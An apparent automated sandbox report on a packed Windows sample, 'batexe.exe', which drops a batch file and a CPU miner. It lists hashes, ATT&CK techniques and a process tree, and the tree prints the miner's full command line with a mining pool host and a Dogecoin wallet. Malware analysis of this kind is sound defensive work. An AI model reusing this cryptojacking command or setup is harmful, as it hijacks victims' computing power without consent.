73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
19/02/2024, 14:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4344	b2e.exe
4300	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe
4300	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2444-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2444 wrote to memory of 4344	2444	batexe.exe	85
PID 2444 wrote to memory of 4344	2444	batexe.exe	85
PID 2444 wrote to memory of 4344	2444	batexe.exe	85
PID 4344 wrote to memory of 936	4344	b2e.exe	86
PID 4344 wrote to memory of 936	4344	b2e.exe	86
PID 4344 wrote to memory of 936	4344	b2e.exe	86
PID 936 wrote to memory of 4300	936	cmd.exe	89
PID 936 wrote to memory of 4300	936	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2444
- C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\39E7.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:936
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4300

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe

Filesize
11.9MB

MD5
c087a2e8d6ddf6627693d3662ef601c8

SHA1
d79ebc616c4e090120c6218db7799d9916c23c02

SHA256
5738b43b406bff951528c4d0052225ba6ed3387396aad0780f8f42fbd6ea8205

SHA512
18d6e49c2ecb3a51e8e6dbe2495e67d7adb1cc166a3b5e18944622d72cca19ae128ca4a5756dcc0c75ed4d8f8d86a9edd8c009e5206177fdf7f8b726c3f2725a

Download Submit
C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe

Filesize
1.5MB

MD5
2a089e8bf6578017b5c976d0dacec1b8

SHA1
111f721c4eb9edb2555114a6c8d95d0bac6bf333

SHA256
7c38ff410d155d55353f7c8d0ccda5c2f63a97eadff37a99228b2cff8efddb50

SHA512
5efbe1daa3034284f68f7045fbbd4e26276165f60dca93d455772d5727deaf9ebc059a8b7b0763c6d00243fc8bbff9a197556837e71a1ecfd71e6919b8a7ecfe

Download Submit
C:\Users\Admin\AppData\Local\Temp\2E9D.tmp\b2e.exe

Filesize
3.4MB

MD5
8653a4be6bdeca92ceb79ecaaa0ba664

SHA1
dbd0a0eb5c5519e3dbd980a74840936bedc84e03

SHA256
4b51b5e80a433692cf2bc5dae314830cddb5efa0f83de9810abacd01c402df73

SHA512
a40768d1a79f8be8068cf20ffc809e9d223f970f8d696f85f790ea123c5ddff3d0db62609b14a192bff9fab93400f7919fe7f695e816bd9e841c0f062725ef57

Download Submit
C:\Users\Admin\AppData\Local\Temp\39E7.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
706KB

MD5
32ff16dab940b606f0c4b98b26d521ab

SHA1
4a673117ce43f6f46ca90a03ffe24dbe696083b7

SHA256
9871ca2f1414367c8e818f866a2aa0b8a1ec922672806bdae0c7d0e50f58abde

SHA512
8e26978ce4d658d471a6ef8095752dd71b43c38934bc4cd43aab460960799597daeca3a6f9587312cd8bd3fbd1276079ab11564de92330b056311cbf49977be9

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
425KB

MD5
c384132ff529aca2f7923ec935b225e0

SHA1
cd9ea10c7b275c7cb439d3eaf3e9863940d2c86d

SHA256
435795c02555bc21bcbe9d978ae022549163246d3472133cf4e2a4fa934e5ca2

SHA512
d8c6c6e94668cc1d1b8a2deb0f585dd7c206ae41bf328655f357ea4289e8b139cfec33c3d8151c9065ff811464b2895afb6d9e127fe10f39aada7bb8b26e1ee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
237KB

MD5
58656de1ec92e29874ceb8794215ab3e

SHA1
6334e3886e3fe37f24039494f816b87d40d71663

SHA256
ed85df3218c482e6e448a2df262ff508825be9bfc49c56be5cd36a5494f46ad4

SHA512
f711adca3424fec078176eed9cb16782f04466fcfbd536764c8d81925bd8d8bcd1d98e5e72563e88d11059042791883d95bc3823770951907b55950a506493ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
315KB

MD5
46bb8c9325508f51ec5fed2d766aa62d

SHA1
5f8b2901951e589e2285379adb450fc899f0040a

SHA256
6f0529b86641027af14f906d8538446a85e13d7bab7945260e157bbb071f2402

SHA512
3ccf6ff92afe95b4b5f72bbfdc31f474476df5337742a532acd2da6c483cbf26858e63d5b07277e30f5453a1db1721e19458ced9d9b307ac213215225de9116c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
252KB

MD5
348d89e446d3169c305e9e868c3c0c0a

SHA1
f7228ec39b057bcd715f9ea94326af47ea9643b3

SHA256
c0e475743dc392589082781a190b3269326ac2c25c78e618cfb981e6bd2e5b93

SHA512
0e01bb0f4d7ce6292d96c24dee8dbd20ad1c52b6c304cb78d4b361bec217808786af3d56c1ce5b0c3c9dd25c81fb63ac576ce4240be12eaeb908161d4101a9af

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
469KB

MD5
8155b8c796f01d1239b86e7187624231

SHA1
f2fbd9f63d2ddcabd0a5fb3d1eb48e9364c6793b

SHA256
7a433963701771fb3fb0bb5033653cb52722710ed444b76075bc443a9d7d1631

SHA512
e3061a33ce4f2d2c28004102004d5142b48078659fcc496f669cc5fe1eba3e03cac7abd4866591eccb406ee21d8c9d0472da18e38882f3e4cacfed657b2e2d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
392KB

MD5
090f3daa7848ca6e83d4cb71c4b47a94

SHA1
59ec545c15f37a3dea03d0c7f5a3c619f7cdc47e

SHA256
d2e63f46cc7e279f3e979ffa72bdfd5c4a9d48cb29d9e3acf0cd46e7115c9ac9

SHA512
bb064808b66d104d92e89019c8ba9cf02822e052638bb8785a010aec5f32ed81a49ac0dd6270f07d59d473faff94b4fa65209965e5e20de95a102c24ff120fc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
209KB

MD5
67292660d4cd2c1031d63d08bfbdd884

SHA1
c32bed7c76fe714b00b128d339a2f55d926b47d8

SHA256
179d43615b533ad377fc05604d52b842dd106b84b5c350085230e6718faa40cc

SHA512
4f8b1c3e4b5d1c7186b7e332342d69e0604cf22fdd8fcaa52b0d6350e283522d598391c9feda27cf19df6833ddf6308c8197e2e277bae63fbc85708bc6c3d71a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
202KB

MD5
349179a8ebf479cea7401736bdea94b2

SHA1
c867930752cf18abf5431782dfd6aad8deceabf2

SHA256
b6ef588332394f211d7065e4d774833cff0743bc15e171c28e0e48f4755dd1c5

SHA512
e45c27be33c2b8bf330ede292b34ad9a992c0724271a48fbb5f5c67c00a1db9f1eda306bb471699a2e3923512d87dbba13df73ade82b37bfb4208811045a7778

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
224KB

MD5
5792c4bc8d173551bf241c65bf0f88c6

SHA1
47db0176d06e14603035fd20e25efb421ef31729

SHA256
cd4aefbb1eb9c4636d8885cbd67333988a8e10a0353f982f42a54fd8f10ec45c

SHA512
de12e994d0560d563b696fc522fbb112374121e079494a1aed007fc1a70423563a296aa147ef38873f6ff50fa7432c493a238d43decf7d6a3a4b6c3889109f58

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/2444-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4300-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/4300-50-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/4300-48-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/4300-42-0x0000000000F40000-0x0000000000FFC000-memory.dmp

Filesize
752KB

Download
memory/4300-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4300-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4300-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4344-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4344-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download